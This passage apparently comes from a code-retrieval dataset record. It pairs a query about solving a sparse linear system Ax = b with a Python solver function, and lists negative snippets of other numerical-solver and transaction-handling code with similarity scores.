hasTx(self):\n\t\tif self.isTx:\n\t\t\treturn True\n\t\treturn textureFile( self.path.replace( self.extension, '.tx' ) ).exists", "def compare_bytes_with_local_tx(self, tx: BaseTransaction) -> bool:\n assert tx.hash is not None\n # XXX: we have to accept any scope because we only want to know what bytes we have stored\n with tx_allow_context(self, allow_scope=TxAllowScope.ALL):\n local_tx = self.get_transaction(tx.hash)\n local_tx_bytes = bytes(local_tx)\n tx_bytes = bytes(tx)\n if tx_bytes == local_tx_bytes:\n return True\n self.log.critical('non-equal transactions with same id', tx_id=tx.hash.hex(),\n local_tx=local_tx_bytes.hex(), tx=tx_bytes.hex())\n return False", "def __eq__(self, other):\n if not isinstance(other, AccountTransactionItem):\n return False\n\n return self.__dict__ == other.__dict__", "def add_trade(self, trade):\n if not trade:\n return False\n\n self.lock()\n\n trade.id = self._next_trade_id\n self._next_trade_id += 1\n\n self.trades.append(trade)\n self.unlock()", "def test_transactions_no_save(self):\n\n transactions = self.bidding_round_manager.transactions_no_save([self.bidding_round])\n transactions = sorted(transactions, key=lambda x: (x.sell.order_id, x.buy.order_id))\n transactions_iterator = iter(transactions)\n\n self.is_equal_transaction(transactions_iterator.next(),\n Transaction(sell=self.stock_order_seller_0, buy=self.stock_order_third_party_0,\n share_amount=2,\n share_price=self.stock_order_seller_0.order_price_per_share,\n transaction_status=PROCESSED))\n self.is_equal_transaction(transactions_iterator.next(),\n Transaction(sell=self.stock_order_seller_0, buy=self.stock_order_third_party_1,\n share_amount=2,\n share_price=self.stock_order_seller_0.order_price_per_share,\n transaction_status=PROCESSED))\n self.is_equal_transaction(transactions_iterator.next(),\n Transaction(sell=self.stock_order_seller_0, buy=self.stock_order_third_party_2,\n share_amount=1,\n share_price=self.stock_order_seller_0.order_price_per_share,\n transaction_status=PROCESSED))\n self.is_equal_transaction(transactions_iterator.next(),\n Transaction(sell=self.stock_order_seller_0, buy=self.stock_order_employer_0,\n share_amount=10,\n share_price=self.stock_order_seller_0.order_price_per_share,\n transaction_status=PROCESSED))\n self.is_equal_transaction(transactions_iterator.next(),\n Transaction(sell=self.stock_order_seller_0, buy=self.stock_order_employer_1,\n share_amount=10,\n share_price=self.stock_order_seller_0.order_price_per_share,\n transaction_status=PROCESSED))\n self.is_equal_transaction(transactions_iterator.next(),\n Transaction(sell=self.stock_order_seller_0, buy=self.stock_order_employer_2,\n share_amount=10,\n share_price=self.stock_order_seller_0.order_price_per_share,\n transaction_status=PROCESSED))\n self.is_equal_transaction(transactions_iterator.next(),\n Transaction(sell=self.stock_order_seller_1, buy=self.stock_order_third_party_2,\n share_amount=9,\n share_price=self.stock_order_seller_1.order_price_per_share,\n transaction_status=PROCESSED))" ]
[ "0.63742304", "0.6370735", "0.6219345", "0.60635024", "0.601319", "0.5980037", "0.5893599", "0.58903027", "0.5867999", "0.5838565", "0.57914907", "0.5791342", "0.5782304", "0.5757709", "0.5725929", "0.5687621", "0.56499726", "0.56397974", "0.5625594", "0.56239665", "0.55964035", "0.55510736", "0.5543386", "0.5539045", "0.549389", "0.54919744", "0.5491017", "0.54802424", "0.54647964", "0.5415118" ]
0.69847286
0
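Since the Trade and Transaction types behind tranBelong are not shown in this record, here is a minimal runnable sketch of the copy-then-test pattern it uses (mutate a throwaway copy, never the original trade). The class bodies below — isReal, addTrans, belong, tranCol, state — are assumptions reconstructed from the call sites in the snippet, not a known library:

```python
class Transaction:
    def __init__(self, amount):
        self.amount = amount


class Trade:
    """Hypothetical stand-in for the Trade type used by tranBelong."""

    def __init__(self):
        self.state = None
        self.tranCol = []  # transactions already held by this trade

    def isReal(self):
        # Assumption: a "real" trade is one that already holds transactions.
        return bool(self.tranCol)

    def addTrans(self, trans, validate=True):
        # The original snippet passes False here, presumably to skip
        # validation when building the throwaway copy.
        self.tranCol.extend(trans)

    def belong(self, t):
        # Membership test against the trade's transactions.
        return t in self.tranCol


def tranBelong(tr, lst, t):
    """Test membership without mutating tr: mutate a copy instead."""
    if tr.isReal():
        cp = Trade()
        cp.state = tr.state
        cp.addTrans(tr.tranCol + lst, False)
    else:
        cp = tr
    return cp.belong(t)


t1, t2 = Transaction(10), Transaction(20)
trade = Trade()
trade.addTrans([t1])
assert tranBelong(trade, [t2], t2)  # t2 belongs once lst is merged in
assert trade.tranCol == [t1]        # the original trade is untouched
```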
Solve the linear system Ax = b, with the matrix A read from filename and b = (0, 1, 2, 3, ...), using the specified method
def solve_system(A, method):
    # find b vector such that Ax = b
    # with x = [0 1 2 ... size(m)]
    size = A.shape
    true_x = list(xrange(0, size[1]))
    b = A.dot(true_x)
    # solve Ax = b and check solution error
    # direct methods
    if method in [sla.spsolve, direttolu]:
        x = method(A, b)
        print("\t" + method.func_name + " solved " + str(size))
        return x, sol_error(x, true_x)
    # iterative methods
    else:
        # to speed up the convergence of the iterative methods
        # we have to pass a preconditioner (a matrix M
        # that approximates the inverse of A)
        # http://osdir.com/ml/python-scientific-user/2011-06/msg00249.html
        try:
            P = sla.spilu(A, drop_tol=1e-5)
        except Exception as err:
            print("\t", err)
            print("\tTake your dirty singular matrices elsewhere...")
            return None, "nan"
        M = sla.LinearOperator(size, P.solve)
        global current_x
        current_x = None
        try:
            x, status = method(A, b, tol=1e-16, M=M, maxiter=500,
                               callback=callback_func)
        except Exception:
            print("\t" + method.func_name + " converged on " + str(size))
            return current_x, sol_error(current_x, true_x)
        if status != 0:
            print("\t" + method.func_name + " DIDN'T converge on " + str(size)
                  + " in less than 500 iterations")
            return current_x, sol_error(x, true_x)
        else:
            print("\t" + method.func_name + " converged on " + str(size))
            return current_x, sol_error(x, true_x)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def Solver(line1, line2):\n\ta = np.array(line1[0])\n\tb = np.array(line1[1])\n\tu = np.array(line2[0])\n\tv = np.array(line2[1])\n\t#print(a,b,u,v)\n\tc = u[:2]-a[:2]\n\tA = np.vstack((b[:2],-v[:2])).T\n\t#print(A)\n\tx = np.linalg.solve(A,c)\n\t#print(x)\n\tp = a+x[0]*b\n\t#print(p)\n\treturn p", "def solve(ctx):\n my_solver(ctx.obj['filename'])", "def BuildSystem_Linear(M,C,K,Ya,Yv,Yq,Fp=None,Pp=None,Yp=None,Yu=None,Method='default'):\n nDOF = M.shape[0]\n nY = Yq.shape[0]\n if Yu is None:\n nU = 0\n Yu = np.zeros((nY,nU))\n else:\n nU = Yu.shape[1]\n\n if Method=='default':\n Z=np.zeros((nDOF,nDOF))\n I=np.eye(nDOF)\n Xx = np.block( [ [Z , I ], [ mM_K, mM_C] ])\n Xu = np.zeros((2*nDOF,nU))\n Yx = np.block( [ Yq + np.dot(Ya,mM_K), Yv + np.dot(Ya, mM_C) ] )\n elif Method == 'augmented_first_order':\n # Needs Fp and Pp to be defined!\n if Fp is None or Pp is None:\n raise Exception('Both Fp and Pp needs to be set with augmented first order method')\n nP = Fp.shape[1]\n if Yp is None:\n Yp=np.zeros((nY,nP))\n\n Z = np.zeros((nDOF,nDOF))\n Znnp = np.zeros((nDOF,nP ))\n Znpn = np.zeros((nP ,nDOF))\n I = np.eye(nDOF)\n mM_K = np.linalg.solve(-M,K)\n mM_C = np.linalg.solve(-M,C)\n M_Fp = np.linalg.solve(M,Fp)\n Xx = np.block( [ [Z, I ,Znnp] , [mM_K, mM_C, M_Fp], [Znpn, Znpn, Pp] ])\n Xu = np.zeros((2*nDOF+nP,nU))\n Yx = np.block( [Yq + np.dot(Ya,mM_K), Yv + np.dot(Ya,mM_C), Yp+np.dot(Ya,M_Fp) ])\n# print('Yq..:\\n', Yq + np.dot(Ya,mM_K))\n# print('Yv..:\\n', Yv + np.dot(Ya,mM_C))\n# print('Fp..:\\n', Yp+np.dot(Ya,M_Fp) )\n else:\n raise Exception('Method %s not implemented')\n \n return Xx,Xu,Yx,Yu", "def solve(matrix, b):\n lu_matrix = decompose_to_LU(matrix)\n # get supporting vector y\n y = np.matrix(np.zeros([lu_matrix.shape[0], 1]), dtype=np.float64)\n for i in range(y.shape[0]):\n y[i, 0] = b[i] - lu_matrix[i, :i] * y[:i]\n\n # get vector of answers x\n x = np.matrix(np.zeros([lu_matrix.shape[0], 1]))\n for i in range(1, x.shape[0] + 1):\n x[-i, 0] = (y[-i] - lu_matrix[-i, -i:] * x[-i:, 0]) / lu_matrix[-i, -i]\n\n return np.array(x.transpose()[0], dtype=np.float64)[0]", "def solve_matrix(M, b):\n\n try:\n x = np.linalg.solve(M, b)\n except np.LinAlgError:\n print(\"ERR: Matrix is singular\")\n return None\n\n if not np.allclose(np.dot(M, x), b):\n print(\"ERR: Matrix is inconsistent (most likely with the independent sources)\")\n return None\n \n return x", "def linear(m, b, x, xx):\n y = m*(x - xx) + b\n return y", "def solve_lu(matvec: Callable, b: jnp.ndarray) -> jnp.ndarray:\n if len(b.shape) == 0:\n return b / _materialize_array(matvec, b.shape)\n elif len(b.shape) == 1:\n A = _materialize_array(matvec, b.shape, b.dtype)\n return jax.numpy.linalg.solve(A, b)\n elif len(b.shape) == 2:\n A = _materialize_array(matvec, b.shape, b.dtype) # 4d array (tensor)\n A = A.reshape(-1, b.shape[0] * b.shape[1]) # 2d array (matrix)\n return jax.numpy.linalg.solve(A, b.ravel()).reshape(*b.shape)\n else:\n raise NotImplementedError", "def solve(self):\n\n # Assign variables to each quantity being solved.\n r_lookup, lookup, num = {}, {}, 0\n for element in self.elements:\n if is_wire(element) and element is not self.ground:\n lookup[num] = element\n r_lookup[element] = num\n num += 1\n elif not is_cs(element) and element is not self.ground:\n lookup[num] = element\n r_lookup[element] = num\n num += 1\n\n # Set up the linear algebraic equation Ax=b\n A = np.zeros((num, num))\n b = np.zeros(num)\n for row, element in lookup.items():\n if is_wire(element) and element is not self.ground:\n for 
two_sided in element.attached:\n if is_cs(two_sided):\n if two_sided.pos is element:\n b[row] += -1 * two_sided.current\n else:\n b[row] += two_sided.current\n else:\n if two_sided.pos is element:\n flow = 1\n else:\n flow = -1\n A[row, r_lookup[two_sided]] = flow\n elif is_vs(element):\n check_connected(element)\n if element.pos is not self.ground:\n A[row, r_lookup[element.pos]] = 1\n if element.neg is not self.ground:\n A[row, r_lookup[element.neg]] = -1\n b[row] = element.voltage\n elif is_resistor(element):\n check_connected(element)\n if element.pos is not self.ground:\n A[row, r_lookup[element.pos]] = 1\n if element.neg is not self.ground:\n A[row, r_lookup[element.neg]] = -1\n A[row, r_lookup[element]] = -1 * element.resistance\n\n b = b.reshape((num, 1))\n try:\n x = np.linalg.solve(A, b)\n except np.linalg.LinAlgError:\n raise CircuitError('Insufficient information to solve circuit')\n\n # Assign values to all circuit components\n for i in range(num):\n item = lookup[i]\n if is_wire(item):\n item.potential = x[i, 0]\n elif isinstance(item, DualSided):\n item.current = x[i, 0]\n\n # Mark circuit as solved\n self.been_solved = True", "def compute(self, solver=\"cbc\", **kwargs):\n self.table2es()\n logging.info(\"Creating the linear model...\")\n model = solph.Model(self.es)\n logging.info(\"Done. Optimise the model.\")\n self.solve(model, solver=solver, **kwargs)", "def solver(I, f, c, bc, Lx, Ly, nx, ny, dt, tstop,\n user_action=None, \n implementation={'ic': 'vec', # or 'scalar' or 'weave'\n 'inner': 'vec',\n 'bc': 'vec',\n 'storage': 'f77'},\n verbose=True):\n dx = Lx/float(nx)\n dy = Ly/float(ny)\n x = linspace(0, Lx, nx+1) # grid points in x dir\n y = linspace(0, Ly, ny+1) # grid points in y dir\n xv = x[:,newaxis] # for vectorized function evaluations\n yv = y[newaxis,:]\n\n if dt <= 0: # max time step?\n dt = (1/float(c))*(1/sqrt(1/dx**2 + 1/dy**2))\n Cx = c*dt/dx**2; Cy = c*dt/dy**2 # help variables\n\n up = zeros((nx+1,ny+1)) # solution array\n u = up.copy() # solution at t-dt\n\n # use scalar implementation mode if no info from user:\n if 'ic' not in implementation:\n implementation['ic'] = 'scalar'\n if 'bc' not in implementation:\n implementation['bc'] = 'scalar'\n if 'inner' not in implementation:\n implementation['inner'] = 'scalar'\n\n if 'weave' in implementation.itervalues() or \\\n 'f77' in implementation.itervalues():\n # we avoid callback to Python and require f, bc, and I to be\n # string formulas:\n print f, bc, I\n if not isinstance(f, StringFunction) or \\\n not isinstance(bc, StringFunction) or \\\n not isinstance(I, StringFunction):\n raise TypeError, \\\n 'with Weave or F77, f, bc, and I must be StringFunction'\n\n if 'f77' in implementation.itervalues():\n make_f77(f, bc, I) # build F77 module\n import f77\n # unified names with py versions:\n ic_f77 = f77.ic_f77\n bc_f77 = f77.bc_f77\n scheme_f77 = f77.scheme_f77\n \n # turn arrays to column major storage after the init. 
cond.\n\n # set initial condition:\n t0 = time.clock()\n t = 0.0\n print '***', implementation['ic']\n func = 'ic_'+implementation['ic']\n if func == 'ic_vec':\n u = eval(func)(u, I, xv, yv)\n elif func == 'ic_f77':\n u = eval(func)(u, x, y)\n else:\n u = eval(func)(u, I, x, y)\n t_ic = time.clock() - t0\n \n\n if implementation['inner'] == 'f77':\n # turn input arrays to Fortran storage for all arrays\n # that are input arrays in loop subroutine\n # (actually not necessary as up, u, and um are all fed\n # through the f77.loop routine and brought to column\n # major storage in turn - recall um=u, u=up, up=um)\n if implementation.get('storage', 'f77') == 'f77':\n up = asarray(up, order='Fortran')\n u = asarray(u, order='Fortran')\n\n if user_action is not None:\n user_action(u, xv, yv, t) # allow user to plot etc.\n\n t_inner = 0 # CPU time inner loops\n t_bc = 0 # CPU time boundary update\n \n while t <= tstop:\n t_old = t; t += dt\n if verbose:\n print 'solving (%s version) at t=%g' % \\\n (implementation['inner'], t)\n\n t0 = time.clock()\n # update all inner points:\n func = 'scheme_'+implementation['inner']\n if func == 'scheme_vec':\n up = eval(func)(up, u, um, f, xv, yv, t, Cx, Cy, dt2, t_old)\n elif func == 'scheme_f77':\n up = eval(func)(up, u, um, x, y, t, Cx, Cy, dt2, t_old)\n else:\n up = eval(func)(up, u, um, f, x, y, t, Cx, Cy, dt2, t_old)\n\n #id_u = id(u); id_um = id(um)\n #up,u,um = f77.loop(up, u, um, f_array, Cx, Cy, dt2)\n #print 'u changed:', id_u!=id(u),\n #print 'um changed:', id_um!=id(um),\n t_inner += time.clock() - t0\n\n t0 = time.clock()\n # insert boundary conditions:\n func = 'bc_'+implementation['bc']\n if func == 'bc_f77':\n up = eval(func)(up, x, y, t)\n else:\n up = eval(func)(up, bc, x, y, t)\n t_bc += time.clock() - t0\n \n if user_action is not None:\n user_action(up, xv, yv, t)\n # update data structures for next step:\n u, up = u, up\n\n # dt might be computed in this function\n return dt, t_ic, t_inner, t_bc", "def linear_program_eq(self, c, A, b, lb, ub):\n if self.solver == solver_SCIPY:\n c = c.reshape((c.size,))\n b = b.reshape((b.size,))\n return scipy_linear_program_eq(c, A, b, lb, ub)\n elif self.solver == solver_GUROBI:\n return gurobi_linear_program_eq(c, A, b, lb, ub)\n else:\n raise ValueError('QP solver %s not available' % self.solver)", "def solve(self, b):\n raise NotImplementedError", "def solver(I, V, m, b, s, F, t, damping='linear'):\n N = t.size - 1 # No of time intervals\n dt = t[1] - t[0] # Time step\n u = np.zeros(N+1) # Result array\n b = float(b); m = float(m) # Avoid integer division\n\n # Convert F to array\n if callable(F):\n F = F(t)\n elif isinstance(F, (list,tuple,np.ndarray)):\n F = np.asarray(F)\n else:\n raise TypeError(\n 'F must be function or array, not %s' % type(F))\n\n u[0] = I\n if damping == 'linear':\n u[1] = u[0] + dt*V + dt**2/(2*m)*(-b*V - s(u[0]) + F[0])\n elif damping == 'quadratic':\n u[1] = u[0] + dt*V + \\\n dt**2/(2*m)*(-b*V*abs(V) - s(u[0]) + F[0])\n else:\n raise ValueError('Wrong value: damping=\"%s\"' % damping)\n\n for n in range(1,N):\n if damping == 'linear':\n u[n+1] = old_div((2*m*u[n] + (b*dt/2 - m)*u[n-1] +\n dt**2*(F[n] - s(u[n]))),(m + b*dt/2))\n elif damping == 'quadratic':\n u[n+1] = old_div((2*m*u[n] - m*u[n-1] + b*u[n]*abs(u[n] - u[n-1])\n - dt**2*(s(u[n]) - F[n])),\\\n (m + b*abs(u[n] - u[n-1])))\n return u, t", "def LU_solve(A, d, b):\n \n\n L, U = L1U(A, d)\n\n y = rforwardsolve(L, b, d)\n x = rbackwardsolve(U, y, d)\n\n return x", "def solver(direc):\r\n\r\n # open inputfile\r\n 
file = 'schroedinger.inp'\r\n fn = os.path.join(direc, file)\r\n inp_all = open(fn, 'r')\r\n\r\n # read parameters from inputfile\r\n lines = inp_all.readlines()\r\n inp_mass = lines[0].split()[0]\r\n mass = float(inp_mass)\r\n inp_xmin = lines[1].split()[0]\r\n xmin = float(inp_xmin)\r\n inp_xmax = lines[1].split()[1]\r\n xmax = float(inp_xmax)\r\n inp_npoint = lines[1].split()[2]\r\n npoint = int(inp_npoint)\r\n inp_firsteigval = lines[2].split()[0]\r\n firsteigval = int(inp_firsteigval)\r\n inp_lasteigval = lines[2].split()[1]\r\n lasteigval = int(inp_lasteigval)\r\n interpoltype = lines[3].split()[0]\r\n inp_nrinterpolpoints = lines[4].split()[0]\r\n nrinterpolpoints = int(inp_nrinterpolpoints)\r\n len_pot = len(lines)-5\r\n xpot = np.zeros(len_pot)\r\n ypot = np.zeros(len_pot)\r\n for ii in range(5, len_pot+5):\r\n xpot[ii - 5] = float(lines[ii].split()[0])\r\n ypot[ii - 5] = float(lines[ii].split()[1])\r\n\r\n # read interpolation type and interpolate the potential\r\n xx = np.linspace(xmin, xmax, npoint)\r\n if interpoltype == 'linear':\r\n pot = np.interp(xx, xpot, ypot)\r\n elif interpoltype == 'polynomial':\r\n degree = int(nrinterpolpoints - 1)\r\n coef = np.polyfit(xpot, ypot, degree)\r\n polf = np.poly1d(coef)\r\n pot = polf(xx)\r\n elif interpoltype == 'cspline':\r\n cubicf = interp1d(xpot, ypot, kind='cubic')\r\n pot = cubicf(xx)\r\n else:\r\n print('interpolation type not found')\r\n sys.exit(1)\r\n\r\n # save x- and y-values for interpolated potential in potential.dat file\r\n potential = np.array([xx, pot])\r\n xypotential = potential.T\r\n np.savetxt(os.path.join(direc, 'potential.dat'), xypotential)\r\n\r\n # formulate matrix-problem for the discretised Schroedinger equation\r\n matrix = np.zeros((npoint, npoint))\r\n delta = abs((xmax-xmin)/(npoint))\r\n aa = 1/(mass*(delta)**2)\r\n for ii in range(1, npoint):\r\n matrix[ii, ii-1] = -aa/2\r\n for ii in range(0, npoint):\r\n matrix[ii, ii] = aa+pot[ii]\r\n for ii in range(0, npoint-1):\r\n matrix[ii, ii+1] = -aa/2\r\n\r\n # compute eigenvalues and eigenvectors\r\n energy, wavefunc = scipy.linalg.eigh(matrix, eigvals=(int(firsteigval-1),\r\n int(lasteigval-1)))\r\n\r\n # normalize wavefunctions\r\n deltavec = delta*np.ones((1, npoint))\r\n wavefunc_sq = wavefunc**2\r\n norm_sq = np.dot(deltavec, wavefunc_sq)\r\n norm = 1/(np.sqrt(norm_sq))\r\n norm_wavefunc = np.dot(wavefunc, np.diag(np.reshape(norm,\r\n (len(energy), ))))\r\n\r\n # save eigenvalues and eigenvectors in energies.dat and wavefuncs.dat files\r\n np.savetxt(os.path.join(direc, 'energies.dat'), energy)\r\n wavefuncs = np.hstack((xx.reshape((npoint, 1)), norm_wavefunc))\r\n np.savetxt(os.path.join(direc, 'wavefuncs.dat'), wavefuncs)\r\n\r\n # compute expectation values and uncertainty for the position\r\n exp_value = np.zeros(lasteigval-firsteigval+1)\r\n exp_value_sq = np.zeros(lasteigval-firsteigval+1)\r\n uncert_x = np.zeros(lasteigval-firsteigval+1)\r\n for ii in range(firsteigval-1, lasteigval):\r\n exp_value[ii] = delta*np.sum(norm_wavefunc[:, ii]**2*xx)\r\n exp_value_sq[ii] = delta*np.sum(norm_wavefunc[:, ii]**2*xx**2)\r\n uncert_x[ii] = np.sqrt(exp_value_sq[ii]-exp_value[ii]**2)\r\n\r\n # save expectation values and uncertainty for the position in expvalues.dat\r\n expvalues = np.array([exp_value, uncert_x])\r\n datexpvalues = expvalues.T\r\n np.savetxt(os.path.join(direc, 'expvalues.dat'), datexpvalues)\r\n\r\n return xypotential, energy", "def solve_den(self, b, method=None):\n m, n = self.shape\n bm, bn = b.shape\n\n if m != bm:\n raise 
DMShapeError(\"Matrix equation shape mismatch.\")\n\n if method is None:\n method = 'rref'\n elif method == 'charpoly' and m != n:\n raise DMNonSquareMatrixError(\"method='charpoly' requires a square matrix.\")\n\n if method == 'charpoly':\n xnum, xden = self.solve_den_charpoly(b)\n elif method == 'rref':\n xnum, xden = self.solve_den_rref(b)\n else:\n raise DMBadInputError(\"method should be 'rref' or 'charpoly'\")\n\n return xnum, xden", "def solve(self, A, B):\n return tf.matrix_solve_ls(matrix=A, rhs=B)", "def test_linear():\n import nose.tools as nt\n A = -0.11; B = -0.13; g = 9.81; m = 50.; T = 10.; dt = 0.01;\n Cd = 1.2; rho = 1.0; A = 0.5;\n a = Cd*rho*A/(2.*m)\n def exact(t):\n return A*t+B\n\n def src(t):\n return m*g + m*a*abs(exact(t-dt/2.))*exact(t+dt/2.) + m*A\n \n v, t = solver(T, dt, B, Cd, rho, A, m, Source=src)\n ve = exact(t)\n diff = abs(ve - v)\n nt.assert_almost_equal(diff.max(), 0, delta=1e-12)", "def solver(\n kappa, f, u_D, Nx, Ny, degree=1,\n linear_solver='Krylov', # Alternative: 'direct'\n abs_tol=1E-5, # Absolute tolerance in Krylov solver\n rel_tol=1E-3, # Relative tolerance in Krylov solver\n max_iter=1000, # Max no of iterations in Krylov solver\n log_level=PROGRESS, # Amount of solver output\n dump_parameters=False, # Write out parameter database?\n ):\n # Create mesh and define function space\n mesh = UnitSquareMesh(Nx, Ny)\n V = FunctionSpace(mesh, 'P', degree)\n\n def boundary(x, on_boundary):\n return on_boundary\n\n bc = DirichletBC(V, u_D, boundary)\n\n # Define variational problem\n u = TrialFunction(V)\n v = TestFunction(V)\n a = kappa*dot(grad(u), grad(v))*dx\n L = f*v*dx\n\n # Compute solution\n u = Function(V)\n\n if linear_solver == 'Krylov':\n prm = parameters['krylov_solver'] # short form\n prm['absolute_tolerance'] = abs_tol\n prm['relative_tolerance'] = rel_tol\n prm['maximum_iterations'] = max_iter\n print(parameters['linear_algebra_backend'])\n set_log_level(log_level)\n if dump_parameters:\n info(parameters, True)\n solver_parameters = {'linear_solver': 'gmres',\n 'preconditioner': 'ilu'}\n else:\n solver_parameters = {'linear_solver': 'lu'}\n\n solve(a == L, u, bc, solver_parameters=solver_parameters)\n return u", "def main():\n \n fname = sys.argv[1]\n fin = open(fname)\n a123 = []\n batms = []\n##### Read in old basis and vectors\n for line in fin:\n if line[0] == \"#\": continue\n \n line = line.split()\n line = [ float(x.strip()) for x in line[:3] ]\n \n if len(a123) == 3: batms.append(line); continue\n a123.append(line)\n \n fname = sys.argv[2]\n fin = open(fname)\n b123 = []\n for line in fin:\n if line[0] == \"#\": continue\n \n line = line.split()\n line = [ float(x.strip()) for x in line[:3] ]\n \n b123.append(line)\n if len(b123) == 3: break\n \n print \"... lattice vectors \\n old new \"\n for i in range(3):\n print (\" %1.4f | %1.4f | %1.4f %1.4f | %1.4f | %1.4f \" % \n (a123[0][i], a123[1][i], a123[2][i], b123[0][i], b123[1][i], b123[2][i]) )\n \n print \"... 
basis atoms = \"\n for i in range(len(batms)):\n print \" %1.4f %1.4f %1.4f\" % (batms[i][0], batms[i][1], batms[i][2])\n \n\n##### Read in new basis that you want to switch to\n##### Take any point q_A = (q1,q2,q3) then q_E = q1*a1_E + q2*a2_E + q3*a3_E = (x, y ,z)\n##### Hence, we can say that q_B = (p1,p2,p3) = q1*a1_B + q2*a2_B + q3*a3_B\n\n##### Writing in matrix form we can say that [ a1_E | a2_E | a3_E ]*q_A = q_E\n##### Apply the same logic to vector ai we see [b1_E | b2_E | b3_E ]*ai_B = ai_E\n##### Hence, --> ////ai_B = cbm*ae_E|\\\\\\\\\n \n a123 = [np.array(x) for x in a123] #old basis\n b123 = [np.array(x) for x in b123] #new basis\n \n B = np.transpose(b123)\n \n invB = np.linalg.inv(B)\n a123_B = [np.dot(x,invB) for x in a123]\n A_B = np.transpose(a123_B) #representation of old vectors in new space (colum wise)\n print \" ... representation of old vectors in the new basis = \"\n for i in range(3):\n print \" %1.7f | %1.7f | %1.7f\" % (A_B[0][i], A_B[1][i], A_B[2][i])\n \n##### Build 5 unit cells all around\n comb = [] #array containing unit cell coordinates\n for i1 in range(-2,2):\n for i2 in range(-2,2):\n for i3 in range(-2,2):\n comb.append([i1,i2,i3])\n \n nuc = len(comb)\n b2atms = [] #new basis atoms \n b2map = [] #new basis map\n\n for uc in comb:\n for i in range(len(batms)):\n tmp = [ uc[0]+batms[i][0], uc[1]+batms[i][1], uc[2]+batms[i][2] ] # add all basis atoms in each unit cell\n prcs = 4 # significat figures for rounding\n tmp = np.array(tmp)\n tmp = np.dot(A_B,tmp) # matrix multiplication\n tmp = np.round(tmp,prcs) \n eps = 0 #needed for round off error\n if -eps<=tmp[0]<1+eps and -eps<=tmp[1]<1+eps and -eps<=tmp[2]<1+eps: # if in first unit cell\n b2atms.append(tmp.tolist())\n b2map.append( [uc[0],uc[1],uc[2],i] ) \n \n print \"--> New basis has \" + str(len(b2atms)) + \" atoms in fractional coordinates:\"\n for i in range(len(b2atms)):\n print ( \" %1.4f %1.4f %1.4f <-- %1.0f %1.0f %1.0f|%1.0f\" % \n (b2atms[i][0], b2atms[i][1], b2atms[i][2], b2map[i][0], b2map[i][1], b2map[i][2], b2map[i][3]) )", "def solveLinearSystem(aMat, bMat):\n numRow = aMat.rows\n dummyVec = mkVector(\"x\", numRow)\n dummySymbols = [v for v in dummyVec]\n #\n system = aMat, bMat\n result = sympy.linsolve(system, *dummyVec)\n lst = flatten(result)\n # Handle case of multiple solutions\n subs = {s: 1 for s in lst if s in dummySymbols}\n return evaluate(sympy.Matrix(lst), subs=subs)", "def solve_matrices(M, y, solve_algorithm=\"PCA\", use_gpu=False):\n\n if solve_algorithm == \"PCA\":\n #Use PCA via linalg.solve in either numpy or cupy\n if (use_gpu):\n #Use cupy linalg.solve to solve for zcoeff in batch for all_M and\n #all_y where all_M and all_y are 3d and 2d arrays representing\n #M and y at every redshift bin for the given template.\n #There is no Error thrown by cupy's version.\n return cp.linalg.solve(M, y)\n else:\n #Use numpy linalg.solve which throws exception\n try:\n return np.linalg.solve(M, y)\n except np.linalg.LinAlgError:\n raise\n elif solve_algorithm == \"NMF\":\n raise NotImplementedError(\"NMF is not yet implemented.\")\n else:\n raise NotImplementedError(\"The solve_algorithm \"+solve_algorithm+\" is not implemented.\")", "def solve(a, b):\n raise NotImplementedError", "def linear_program_ineq(self, c, A, b):\n if self.solver == solver_SCIPY:\n c = c.reshape((c.size,))\n b = b.reshape((b.size,))\n return scipy_linear_program_ineq(c, A, b)\n elif self.solver == solver_GUROBI:\n return gurobi_linear_program_ineq(c, A, b)\n else:\n raise ValueError('QP solver %s not 
available' % self.solver)", "def test_solver():\n # Choice of nonlinear coefficient\n m = 2\n\n def q(u):\n return (1+u)**m\n\n def Dq(u):\n return m*(1+u)**(m-1)\n\n u_exact = Expression(\n 'pow((pow(2, m+1)-1)*x[0] + 1, 1.0/(m+1)) - 1', m=m)\n linear_solver = 'direct'\n errors = []\n for method in 'alg_Newton', 'pde_Newton':\n for J_comp in 'manual', 'automatic':\n for degree in 1, 2, 3:\n error_prev = -1\n for divisions in [(10, 10), (20, 20), (40, 40)]:\n u = solver(\n q, Dq, f, divisions, degree,\n method, J_comp,\n linear_solver,\n abs_tol_Krylov=1E-10,\n rel_tol_Krylov=1E-10,\n abs_tol_Newton=1E-10,\n rel_tol_Newton=1E-10)\n\n # Find max error\n u_e = interpolate(u_exact, u.function_space())\n import numpy as np\n error = np.abs(u_e.vector().array() -\n u.vector().array()).max()\n # Expect convergence as h**(degree+1)\n if error_prev > 0:\n frac = abs(error - error_prev/2**(degree+1))\n errors.append(frac)\n error_prev = error\n tol = 4E-5\n for error_reduction in errors:\n assert error_reduction < tol, error_reduction", "def solve_motion_equations(M, B, state_vars=[], input_vars=[], parameters_values=dict()):\n\n M_shape = M.shape\n B_shape = B.shape\n assert(M_shape[0] == B_shape[0])\n\n # at first we create a buffer for the string that we complete and execute \n # to dynamically define a function and return it\n fnc_str_buffer = '''\ndef f(x, u, uuref, t, pp):\n # System variables\n %s # x_str\n %s # u_str\n \n # Parameters\n %s # par_str\n \n # Sympy Common Expressions\n %s # cse_str\n\n # Vectorfield\n %s # ff_str\n \n return ff\n'''\n\n #################################\n # handle system state variables #\n #################################\n # --> leads to x_str which shows how to unpack the state variables\n x_str = ''\n for var in state_vars:\n x_str += '%s, '%str(var)\n\n # as a last we remove the trailing '; ' to avoid syntax erros\n x_str = x_str + '= x'\n\n ##########################\n # handle input variables #\n ##########################\n # --> leads to u_str which will show how to unpack the inputs of the control system\n u_str = ''\n for var in input_vars:\n u_str += '%s, '%str(var)\n\n # after we remove the trailing '; ' to avoid syntax errors x_str will look like:\n # 'u1, u2, ... , um = u'\n u_str = u_str + '= u'\n\n ############################\n # handle system parameters #\n ############################\n # --> leads to par_str\n par_str = ''\n for k, v in list(parameters_values.items()):\n # 'k' is the name of a system parameter such as mass or gravitational acceleration\n # 'v' is its value in SI units\n par_str += '%s = %s; '%(str(k), str(v))\n\n # as a last we remove the trailing '; ' from par_str to avoid syntax errors\n par_str = par_str[:-2]\n\n # now solve the motion equations w.r.t. 
